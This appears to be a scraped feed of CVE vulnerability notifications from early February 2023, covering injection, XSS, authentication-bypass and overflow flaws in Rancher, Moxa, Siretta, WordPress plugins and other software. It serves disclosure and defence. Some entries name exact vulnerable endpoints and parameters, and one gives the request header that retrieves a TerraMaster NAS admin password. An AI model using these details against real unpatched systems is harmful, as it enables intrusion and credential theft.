🚨 CVE-2023-24612The PdfBook extension through 2.0.5 before b07b6a64 for MediaWiki allows command injection via an option.🎖@cveNotify |
|
| 2023-02-07 20:30:21 |
🚨 CVE-2022-45789A CWE-294: Authentication Bypass by Capture-replay vulnerability exists that could cause execution of unauthorized Modbus functions on the controller when hijacking an authenticated Modbus session. Affected Products: EcoStruxure™ Control Expert (All Versions), EcoStruxure™ Process Expert (Versions prior to V2020), Modicon M340 CPU - part numbers BMXP34* (All Versions), Modicon M580 CPU - part numbers BMEP* and BMEH* (All Versions), Modicon M580 CPU Safety - part numbers BMEP58*S and BMEH58*S (All Versions)🎖@cveNotify |
|
| 2023-02-07 20:30:19 |
🚨 CVE-2022-43978There is an improper authentication vulnerability in Pandora FMS v764. The application verifies that the user has a valid session when he is not trying to do a login. Since the secret is static in generatePublicHash function, an attacker with knowledge of a valid session can abuse this in order to pass the authentication check.🎖@cveNotify |
|
| 2023-02-07 20:30:17 |
🚨 CVE-2021-46873WireGuard, such as WireGuard 0.5.3 on Windows, does not fully account for the possibility that an adversary might be able to set a victim's system time to a future value, e.g., because unauthenticated NTP is used. This can lead to an outcome in which one static private key becomes permanently useless.🎖@cveNotify |
|
| 2023-02-07 20:30:15 |
🚨 CVE-2022-39812Italtel NetMatch-S CI 5.2.0-20211008 allows Absolute Path Traversal under NMSCI-WebGui/SaveFileUploader. An unauthenticated user can upload files to an arbitrary path. An attacker can change the uploadDir parameter in a POST request (not possible using the GUI) to an arbitrary directory. Because the application does not check in which directory a file will be uploaded, an attacker can perform a variety of attacks that can result in unauthorized access to the server.🎖@cveNotify |
|
| 2023-02-07 20:30:13 |
🚨 CVE-2011-10002A vulnerability classified as critical has been found in weblabyrinth 0.3.1. This affects the function Labyrinth of the file labyrinth.inc.php. The manipulation leads to sql injection. Upgrading to version 0.3.2 is able to address this issue. The name of the patch is 60793fd8c8c4759596d3510641e96ea40e7f60e9. It is recommended to upgrade the affected component. The identifier VDB-220221 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-07 20:30:12 |
🚨 CVE-2022-40224A denial of service vulnerability exists in the web server functionality of Moxa SDS-3008 Series Industrial Ethernet Switch 2.1. A specially-crafted HTTP message header can lead to denial of service. An attacker can send an HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-02-07 20:30:09 |
🚨 CVE-2022-40691An information disclosure vulnerability exists in the web application functionality of Moxa SDS-3008 Series Industrial Ethernet Switch 2.1. A specially-crafted HTTP request can lead to a disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-02-07 20:30:07 |
🚨 CVE-2022-40693A cleartext transmission vulnerability exists in the web application functionality of Moxa SDS-3008 Series Industrial Ethernet Switch 2.1. A specially-crafted network sniffing can lead to a disclosure of sensitive information. An attacker can sniff network traffic to trigger this vulnerability.🎖@cveNotify |
|
| 2023-02-07 20:30:04 |
🚨 CVE-2022-41311A stored cross-site scripting vulnerability exists in the web application functionality of Moxa SDS-3008 Series Industrial Ethernet Switch 2.1. A specially-crafted HTTP request can lead to arbitrary Javascript execution. An attacker can send an HTTP request to trigger this vulnerability.Form field id="webLocationMessage_text" name="webLocationMessage_text"🎖@cveNotify |
|
| 2023-02-07 20:30:02 |
🚨 CVE-2022-41312A stored cross-site scripting vulnerability exists in the web application functionality of Moxa SDS-3008 Series Industrial Ethernet Switch 2.1. A specially-crafted HTTP request can lead to arbitrary Javascript execution. An attacker can send an HTTP request to trigger this vulnerability.Form field id="Switch Description", name "switch_description"🎖@cveNotify |
|
| 2023-02-07 20:29:58 |
🚨 CVE-2022-41313A stored cross-site scripting vulnerability exists in the web application functionality of Moxa SDS-3008 Series Industrial Ethernet Switch 2.1. A specially-crafted HTTP request can lead to arbitrary Javascript execution. An attacker can send an HTTP request to trigger this vulnerability.Form field id="switch_contact"🎖@cveNotify |
|
| 2023-02-07 20:29:55 |
🚨 CVE-2022-24990TerraMaster NAS 4.2.29 and earlier allows remote attackers to discover the administrative password by sending "User-Agent: TNAS" to module/api.php?mobile/webNasIPS and then reading the PWD field in the response.🎖@cveNotify |
|
| 2023-02-07 20:29:53 |
🚨 CVE-2022-45544Insecure Permission vulnerability in Schlix Web Inc SCHLIX CMS 2.2.7-2 allows attacker to upload arbitrary files and execute arbitrary code via the tristao parameter.🎖@cveNotify |
|
| 2023-02-07 20:29:51 |
🚨 CVE-2022-21953A Missing Authorization vulnerability in of SUSE Rancher allows authenticated user to create an unauthorized shell pod and kubectl access in the local cluster This issue affects: SUSE Rancher Rancher versions prior to 2.5.17; Rancher versions prior to 2.6.10; Rancher versions prior to 2.7.1.🎖@cveNotify |
|
| 2023-02-07 20:29:49 |
🚨 CVE-2022-31249A Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in wrangler of SUSE Rancher allows remote attackers to inject commands in the underlying host via crafted commands passed to Wrangler. This issue affects: SUSE Rancher wrangler version 0.7.3 and prior versions; wrangler version 0.8.4 and prior versions; wrangler version 1.0.0 and prior versions.🎖@cveNotify |
|
| 2023-02-07 20:29:48 |
🚨 CVE-2022-43755A Insufficient Entropy vulnerability in SUSE Rancher allows attackers that gained knowledge of the cattle-token to continue abusing this even after the token was renewed. This issue affects: SUSE Rancher Rancher versions prior to 2.6.10; Rancher versions prior to 2.7.1.🎖@cveNotify |
|
| 2023-02-07 20:29:45 |
🚨 CVE-2022-43756A Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') vulnerability in SUSE Rancher allows remote attackers to cause denial of service by supplying specially crafted git credentials. This issue affects: SUSE Rancher wrangler version 0.7.3 and prior versions; wrangler version 0.8.4 and prior versions; wrangler version 1.0.0 and prior versions.🎖@cveNotify |
|
| 2023-02-07 20:29:43 |
🚨 CVE-2022-43757A Cleartext Storage of Sensitive Information vulnerability in SUSE Rancher allows users on managed clusters to gain access to credentials. The impact depends on the credentials exposed This issue affects: SUSE Rancher Rancher versions prior to 2.5.17; Rancher versions prior to 2.6.10; Rancher versions prior to 2.7.1.🎖@cveNotify |
|
| 2023-02-07 20:29:41 |
🚨 CVE-2022-43758A Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in SUSE Rancher allows code execution for user with the ability to add an untrusted Helm catalog or modifying the URL configuration used to download KDM (only admin users by default) This issue affects: SUSE Rancher Rancher versions prior to 2.5.17; Rancher versions prior to 2.6.10; Rancher versions prior to 2.7.1.🎖@cveNotify |
|
| 2023-02-07 20:29:38 |
🚨 CVE-2022-43759A Improper Privilege Management vulnerability in SUSE Rancher, allows users with access to the escalate verb on PRTBs to escalate permissions for any -promoted resource in any cluster. This issue affects: SUSE Rancher Rancher versions prior to 2.5.17; Rancher versions prior to 2.6.10.🎖@cveNotify |
|
| 2023-02-07 16:29:48 |
🚨 CVE-2023-23582Snap One Wattbox WB-300-IP-3 versions WB10.9a17 and prior are vulnerable to a heap-based buffer overflow, which could allow an attacker to execute arbitrary code or crash the device remotely.🎖@cveNotify |
|
| 2023-02-07 16:29:47 |
🚨 CVE-2023-22389Snap One Wattbox WB-300-IP-3 versions WB10.9a17 and prior store passwords in a plaintext file when the device configuration is exported via Save/Restore–>Backup Settings, which could be read by any user accessing the file.🎖@cveNotify |
|
| 2023-02-07 16:29:46 |
🚨 CVE-2022-48175Rukovoditel v3.2.1 was discovered to contain a remote code execution (RCE) vulnerability in the component /rukovoditel/index.php?module=dashboard/ajax_request.🎖@cveNotify |
|
| 2023-02-07 16:29:45 |
🚨 CVE-2023-24059Grand Theft Auto V for PC allows attackers to achieve partial remote code execution or modify files on a PC, as exploited in the wild in January 2023.🎖@cveNotify |
|
| 2023-02-07 16:29:44 |
🚨 CVE-2021-37491An issue discovered in src/wallet/wallet.cpp in Dogecoin Project Dogecoin Core 1.14.3 and earlier allows attackers to view sensitive information via CWallet::CreateTransaction() function.🎖@cveNotify |
|
| 2023-02-07 16:29:43 |
🚨 CVE-2022-21953A Missing Authorization vulnerability in of SUSE Rancher allows authenticated user to create an unauthorized shell pod and kubectl access in the local cluster This issue affects: SUSE Rancher Rancher versions prior to 2.5.17; Rancher versions prior to 2.6.10; Rancher versions prior to 2.7.1.🎖@cveNotify |
|
| 2023-02-07 16:29:42 |
🚨 CVE-2022-31249A Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in wrangler of SUSE Rancher allows remote attackers to inject commands in the underlying host via crafted commands passed to Wrangler. This issue affects: SUSE Rancher wrangler version 0.7.3 and prior versions; wrangler version 0.8.4 and prior versions; wrangler version 1.0.0 and prior versions.🎖@cveNotify |
|
| 2023-02-07 16:29:41 |
🚨 CVE-2022-43755A Insufficient Entropy vulnerability in SUSE Rancher allows attackers that gained knowledge of the cattle-token to continue abusing this even after the token was renewed. This issue affects: SUSE Rancher Rancher versions prior to 2.6.10; Rancher versions prior to 2.7.1.🎖@cveNotify |
|
| 2023-02-07 16:29:40 |
🚨 CVE-2022-43756A Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') vulnerability in SUSE Rancher allows remote attackers to cause denial of service by supplying specially crafted git credentials. This issue affects: SUSE Rancher wrangler version 0.7.3 and prior versions; wrangler version 0.8.4 and prior versions; wrangler version 1.0.0 and prior versions.🎖@cveNotify |
|
| 2023-02-07 16:29:39 |
🚨 CVE-2022-43757A Cleartext Storage of Sensitive Information vulnerability in SUSE Rancher allows users on managed clusters to gain access to credentials. The impact depends on the credentials exposed This issue affects: SUSE Rancher Rancher versions prior to 2.5.17; Rancher versions prior to 2.6.10; Rancher versions prior to 2.7.1.🎖@cveNotify |
|
| 2023-02-07 16:29:37 |
🚨 CVE-2022-43759A Improper Privilege Management vulnerability in SUSE Rancher, allows users with access to the escalate verb on PRTBs to escalate permissions for any -promoted resource in any cluster. This issue affects: SUSE Rancher Rancher versions prior to 2.5.17; Rancher versions prior to 2.6.10.🎖@cveNotify |
|
| 2023-02-07 16:29:36 |
🚨 CVE-2023-0707A vulnerability was found in SourceCodester Medical Certificate Generator App 1.0. It has been rated as critical. Affected by this issue is the function delete_record of the file function.php. The manipulation of the argument id leads to sql injection. VDB-220346 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-07 13:29:37 |
🚨 CVE-2015-10075A vulnerability was found in Custom-Content-Width 1.0. It has been declared as problematic. Affected by this vulnerability is the function override_content_width/register_settings of the file custom-content-width.php. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.0.1 is able to address this issue. The name of the patch is e05e0104fc42ad13b57e2b2cb2d1857432624d39. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220219. NOTE: This attack is not very likely.🎖@cveNotify |
|
| 2023-02-07 13:29:36 |
🚨 CVE-2023-22643An Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in libzypp-plugin-appdata of SUSE Linux Enterprise Server for SAP 15-SP3; openSUSE Leap 15.4 allows attackers that can trick users to use specially crafted REPO_ALIAS, REPO_TYPE or REPO_METADATA_PATH settings to execute code as root. This issue affects: SUSE Linux Enterprise Server for SAP 15-SP3 libzypp-plugin-appdata versions prior to 1.0.1+git.20180426. openSUSE Leap 15.4 libzypp-plugin-appdata versions prior to 1.0.1+git.20180426.🎖@cveNotify |
|
| 2023-02-07 11:29:41 |
🚨 CVE-2015-10074A vulnerability was found in OpenSeaMap online_chart 1.2. It has been classified as problematic. Affected is the function init of the file index.php. The manipulation of the argument mtext leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version staging is able to address this issue. The name of the patch is 8649157158f921590d650e2d2f4bdf0df1017e9d. It is recommended to upgrade the affected component. VDB-220218 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-07 11:29:37 |
🚨 CVE-2023-0706A vulnerability, which was classified as critical, has been found in SourceCodester Medical Certificate Generator App 1.0. Affected by this issue is some unknown functionality of the file manage_record.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The identifier of this vulnerability is VDB-220340.🎖@cveNotify |
|
| 2023-02-07 11:29:36 |
🚨 CVE-2023-23696Dell Command Intel vPro Out of Band, versions prior to 4.3.1, contain an Improper Authorization vulnerability. A locally authenticated malicious users could potentially exploit this vulnerability in order to write arbitrary files to the system.🎖@cveNotify |
|
| 2023-02-07 11:29:35 |
🚨 CVE-2023-0673A vulnerability classified as critical was found in SourceCodester Online Eyewear Shop 1.0. Affected by this vulnerability is an unknown functionality of the file oews/?p=products/view_product.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-220195.🎖@cveNotify |
|
| 2023-02-07 07:29:46 |
🚨 CVE-2023-22736Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Versions starting with 2.5.0-rc1 and above, prior to 2.5.8, and version 2.6.0-rc4, are vulnerable to an authorization bypass bug which allows a malicious Argo CD user to deploy Applications outside the configured allowed namespaces. Reconciled Application namespaces are specified as a comma-delimited list of glob patterns. When sharding is enabled on the Application controller, it does not enforce that list of patterns when reconciling Applications. For example, if Application namespaces are configured to be argocd-*, the Application controller may reconcile an Application installed in a namespace called other, even though it does not start with argocd-. Reconciliation of the out-of-bounds Application is only triggered when the Application is updated, so the attacker must be able to cause an update operation on the Application resource. This bug only applies to users who have explicitly enabled the "apps-in-any-namespace" feature by setting `application.namespaces` in the argocd-cmd-params-cm ConfigMap or otherwise setting the `--application-namespaces` flags on the Application controller and API server components. The apps-in-any-namespace feature is in beta as of this Security Advisory's publish date. The bug is also limited to Argo CD instances where sharding is enabled by increasing the `replicas` count for the Application controller. Finally, the AppProjects' `sourceNamespaces` field acts as a secondary check against this exploit. To cause reconciliation of an Application in an out-of-bounds namespace, an AppProject must be available which permits Applications in the out-of-bounds namespace. A patch for this vulnerability has been released in versions 2.5.8 and 2.6.0-rc5. As a workaround, running only one replica of the Application controller will prevent exploitation of this bug. Making sure all AppProjects' sourceNamespaces are restricted within the confines of the configured Application namespaces will also prevent exploitation of this bug.🎖@cveNotify |
|
| 2023-02-07 07:29:43 |
🚨 CVE-2021-33844A floating point exception (divide-by-zero) issue was discovered in SoX in functon startread() of wav.c file. An attacker with a crafted wav file, could cause an application to crash.🎖@cveNotify |
|
| 2023-02-07 07:29:41 |
🚨 CVE-2021-3643A flaw was found in sox 14.4.1. The lsx_adpcm_init function within libsox leads to a global-buffer-overflow. This flaw allows an attacker to input a malicious file, leading to the disclosure of sensitive information.🎖@cveNotify |
|
| 2023-02-07 07:29:39 |
🚨 CVE-2017-11358The read_samples function in hcom.c in Sound eXchange (SoX) 14.4.2 allows remote attackers to cause a denial of service (invalid memory read and application crash) via a crafted hcom file.🎖@cveNotify |
|
| 2023-02-07 07:29:37 |
🚨 CVE-2023-23611LTI Consumer XBlock implements the consumer side of the LTI specification enabling integration of third-party LTI provider tools. Versions 7.0.0 and above, prior to 7.2.2, are vulnerable to Missing Authorization. Any LTI tool that is integrated with on the Open edX platform can post a grade back for any LTI XBlock so long as it knows or can guess the block location for that XBlock. An LTI tool submits scores to the edX platform for line items. The code that uploads that score to the LMS grade tables determines which XBlock to upload the grades for by reading the resource_link_id field of the associated line item. The LTI tool may submit any value for the resource_link_id field, allowing a malicious LTI tool to submit scores for any LTI XBlock on the platform. The impact is a loss of integrity for LTI XBlock grades. This issue is patched in 7.2.2. No workarounds exist.🎖@cveNotify |
|
| 2023-02-07 02:29:44 |
🚨 CVE-2022-28923Caddy v2.4.6 was discovered to contain an open redirection vulnerability which allows attackers to redirect users to phishing websites via crafted URLs.🎖@cveNotify |
|
| 2023-02-07 02:29:40 |
🚨 CVE-2022-3229Because the web management interface for Unified Intents' Unified Remote solution does not itself require authentication, a remote, unauthenticated attacker can change or disable authentication requirements for the Unified Remote protocol, and leverage this now-unauthenticated access to run code of the attacker's choosing.🎖@cveNotify |
|
| 2023-02-07 02:29:39 |
🚨 CVE-2022-44617A flaw was found in libXpm. When processing a file with width of 0 and a very large height, some parser functions will be called repeatedly and can lead to an infinite loop, resulting in a Denial of Service in the application linked to the library.🎖@cveNotify |
|
| 2023-02-07 02:29:38 |
🚨 CVE-2022-46496BTicino Door Entry HOMETOUCH for iOS 1.4.2 was discovered to be missing an SSL certificate.🎖@cveNotify |
|
| 2023-02-07 02:29:37 |
🚨 CVE-2023-23849Versions of Coverity Connect prior to 2022.12.0 are vulnerable to an unauthenticated Cross-Site Scripting vulnerability. Any web service hosted on the same sub domain can set a cookie for the whole subdomain which can be used to bypass other mitigations in place for malicious purposes. CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/RL:O/RC:C🎖@cveNotify |
|
| 2023-02-07 00:30:39 |
🚨 CVE-2022-4651The Justified Gallery WordPress plugin before 1.7.1 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.🎖@cveNotify |
|
| 2023-02-07 00:30:28 |
🚨 CVE-2022-4654The Pricing Tables WordPress Plugin WordPress plugin before 3.2.3 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.🎖@cveNotify |
|
| 2023-02-07 00:30:25 |
🚨 CVE-2022-24439All versions of package gitpython are vulnerable to Remote Code Execution (RCE) due to improper user input validation, which makes it possible to inject a maliciously crafted remote URL into the clone command. Exploiting this vulnerability is possible because the library makes external calls to git without sufficient sanitization of input arguments.🎖@cveNotify |
|
| 2023-02-07 00:30:22 |
🚨 CVE-2022-4649The WP Extended Search WordPress plugin before 2.1.2 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.🎖@cveNotify |
|
| 2023-02-07 00:30:20 |
🚨 CVE-2021-31573In Config Manager, there is a possible command injection due to improper input validation. This could lead to remote escalation of privilege from a proximal attacker with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: A20210009; Issue ID: OSBNB00123234.🎖@cveNotify |
|
| 2023-02-07 00:30:16 |
🚨 CVE-2021-31574In Config Manager, there is a possible command injection due to improper input validation. This could lead to remote escalation of privilege from a proximal attacker with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: A20210009; Issue ID: OSBNB00123234.🎖@cveNotify |
|
| 2023-02-07 00:30:13 |
🚨 CVE-2021-31575In Config Manager, there is a possible command injection due to improper input validation. This could lead to remote escalation of privilege from a proximal attacker with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: A20210009; Issue ID: OSBNB00123234.🎖@cveNotify |
|
| 2023-02-07 00:30:11 |
🚨 CVE-2021-31576In Boa, there is a possible information disclosure due to a missing permission check. This could lead to remote information disclosure to a proximal attacker with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: A20210008; Issue ID: OSBNB00123241.🎖@cveNotify |
|
| 2023-02-07 00:30:09 |
🚨 CVE-2021-31577In Boa, there is a possible escalation of privilege due to a missing permission check. This could lead to remote escalation of privilege from a proximal attacker with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: A20210008; Issue ID: OSBNB00123241.🎖@cveNotify |
|
| 2023-02-07 00:30:05 |
🚨 CVE-2021-31578In Boa, there is a possible escalation of privilege due to a stack buffer overflow. This could lead to remote escalation of privilege from a proximal attacker with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: A20210008; Issue ID: OSBNB00123241.🎖@cveNotify |
|
| 2023-02-07 00:30:02 |
🚨 CVE-2022-48166An access control issue in Wavlink WL-WN530HG4 M30HG4.V5030.201217 allows unauthenticated attackers to download configuration data and log files and obtain admin credentials.🎖@cveNotify |
|
| 2023-02-07 00:30:00 |
🚨 CVE-2023-23333There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.🎖@cveNotify |
|
| 2023-02-07 00:29:58 |
🚨 CVE-2022-4835The Social Sharing Toolkit WordPress plugin through 2.6 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-02-07 00:29:57 |
🚨 CVE-2022-4831The Custom User Profile Fields for User Registration WordPress plugin before 1.8.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-02-07 00:29:54 |
🚨 CVE-2022-4834The CPT Bootstrap Carousel WordPress plugin through 1.12 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-02-07 00:29:53 |
🚨 CVE-2022-4828The Bold Timeline Lite WordPress plugin before 1.1.5 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-02-07 00:29:50 |
🚨 CVE-2022-4794The AAWP WordPress plugin before 3.12.3 can be used to abuse trusted domains to load malware or other files through it (Reflected File Download) to bypass firewall rules in companies.🎖@cveNotify |
|
| 2023-02-07 00:29:48 |
🚨 CVE-2022-4793The Blog Designer WordPress plugin before 2.4.1 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.🎖@cveNotify |
|
| 2023-02-07 00:29:45 |
🚨 CVE-2022-4792The News & Blog Designer Pack WordPress plugin before 3.3 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.🎖@cveNotify |
|
| 2023-02-07 00:29:42 |
🚨 CVE-2022-46087CloudSchool v3.0.1 is vulnerable to Cross Site Scripting (XSS). A normal user can steal session cookies of the admin users through notification received by the admin user.🎖@cveNotify |
|
| 2023-02-06 22:29:57 |
🚨 CVE-2017-20177A vulnerability, which was classified as problematic, has been found in WangGuard Plugin 1.8.0. Affected by this issue is the function wangguard_users_info of the file wangguard-user-info.php of the component WGG User List Handler. The manipulation of the argument userIP leads to cross site scripting. The attack may be launched remotely. The name of the patch is 88414951e30773c8d2ec13b99642688284bf3189. It is recommended to apply a patch to fix this issue. VDB-220214 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-06 22:29:56 |
🚨 CVE-2022-32655In Wi-Fi driver, there is a possible undefined behavior due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: GN20220705028; Issue ID: GN20220705028.🎖@cveNotify |
|
| 2023-02-06 22:29:55 |
🚨 CVE-2022-4384The Stream WordPress plugin before 3.9.2 does not prevent users with little privileges on the site (like subscribers) from using its alert creation functionality, which may enable them to leak sensitive information.🎖@cveNotify |
|
| 2023-02-06 22:29:51 |
🚨 CVE-2022-4489The HUSKY WordPress plugin before 1.3.2 unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.🎖@cveNotify |
|
| 2023-02-06 22:29:50 |
🚨 CVE-2022-4577The Easy Testimonials WordPress plugin before 3.9.3 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-02-06 22:29:49 |
🚨 CVE-2022-4670The PDF.js Viewer WordPress plugin before 2.1.8 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-06 22:29:45 |
🚨 CVE-2022-4674The Ibtana WordPress plugin before 1.1.8.8 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack🎖@cveNotify |
|
| 2023-02-06 22:29:44 |
🚨 CVE-2022-4681The Hide My WP WordPress plugin before 6.2.9 does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.🎖@cveNotify |
|
| 2023-02-06 22:29:43 |
🚨 CVE-2022-4747The Post Category Image With Grid and Slider WordPress plugin before 1.4.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-02-06 22:29:39 |
🚨 CVE-2022-4762The Materialis Companion WordPress plugin before 1.3.40 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-02-06 22:29:38 |
🚨 CVE-2022-4824The WP Blog and Widgets WordPress plugin before 2.3.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-02-06 22:29:37 |
🚨 CVE-2022-4826The Simple Tooltips WordPress plugin before 2.1.4 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-02-06 20:29:55 |
🚨 CVE-2023-23614Pi-hole®'s Web interface (based off of AdminLTE) provides a central location to manage your Pi-hole. Versions 4.0 and above, prior to 5.18.3 are vulnerable to Insufficient Session Expiration. Improper use of admin WEBPASSWORD hash as "Remember me for 7 days" cookie value makes it possible for an attacker to "pass the hash" to login or reuse a theoretically expired "remember me" cookie. It also exposes the hash over the network and stores it unnecessarily in the browser. The cookie itself is set to expire after 7 days but its value will remain valid as long as the admin password doesn't change. If a cookie is leaked or compromised it could be used forever as long as the admin password is not changed. An attacker that obtained the password hash via an other attack vector (for example a path traversal vulnerability) could use it to login as the admin by setting the hash as the cookie value without the need to crack it to obtain the admin password (pass the hash). The hash is exposed over the network and in the browser where the cookie is transmitted and stored. This issue is patched in version 5.18.3.🎖@cveNotify |
|
| 2023-02-06 20:29:54 |
🚨 CVE-2022-41991A heap-based buffer overflow vulnerability exists in the m2m DELETE_FILE cmd functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-02-06 20:29:53 |
🚨 CVE-2022-42490Several OS command injection vulnerabilities exist in the m2m binary of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger these vulnerabilities.This command injection is reachable through the m2m's DOWNLOAD_CFG_FILE command🎖@cveNotify |
|
| 2023-02-06 20:29:52 |
🚨 CVE-2022-42492Several OS command injection vulnerabilities exist in the m2m binary of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger these vulnerabilities.This command injection is reachable through the m2m's DOWNLOAD_AD command.🎖@cveNotify |
|
| 2023-02-06 20:29:48 |
🚨 CVE-2022-42493Several OS command injection vulnerabilities exist in the m2m binary of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger these vulnerabilities.This command injection is reachable through the m2m's DOWNLOAD_INFO command.🎖@cveNotify |
|
| 2023-02-06 20:29:47 |
🚨 CVE-2023-23608Spotipy is a light weight Python library for the Spotify Web API. In versions prior to 2.22.1, if a malicious URI is passed to the library, the library can be tricked into performing an operation on a different API endpoint than intended. The code Spotipy uses to parse URIs and URLs allows an attacker to insert arbitrary characters into the path that is used for API requests. Because it is possible to include "..", an attacker can redirect for example a track lookup via spotifyApi.track() to an arbitrary API endpoint like playlists, but this is possible for other endpoints as well. The impact of this vulnerability depends heavily on what operations a client application performs when it handles a URI from a user and how it uses the responses it receives from the API. This issue is patched in version 2.22.1.🎖@cveNotify |
|
| 2023-02-06 20:29:46 |
🚨 CVE-2020-36660A vulnerability was found in paxswill EVE Ship Replacement Program 0.12.11. It has been rated as problematic. This issue affects some unknown processing of the file src/evesrp/views/api.py of the component User Information Handler. The manipulation leads to information disclosure. The attack may be initiated remotely. Upgrading to version 0.12.12 is able to address this issue. The name of the patch is 9e03f68e46e85ca9c9694a6971859b3ee66f0240. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220211.🎖@cveNotify |
|
| 2023-02-06 20:29:45 |
🚨 CVE-2022-47071In NVS365 V01, the background network test function can trigger command execution.🎖@cveNotify |
|
| 2023-02-06 17:30:07 |
🚨 CVE-2022-48078pycdc commit 44a730f3a889503014fec94ae6e62d8401cb75e5 was discovered to contain a stack overflow via the component ASTree.cpp:BuildFromCode.🎖@cveNotify |
|
| 2023-02-06 17:30:05 |
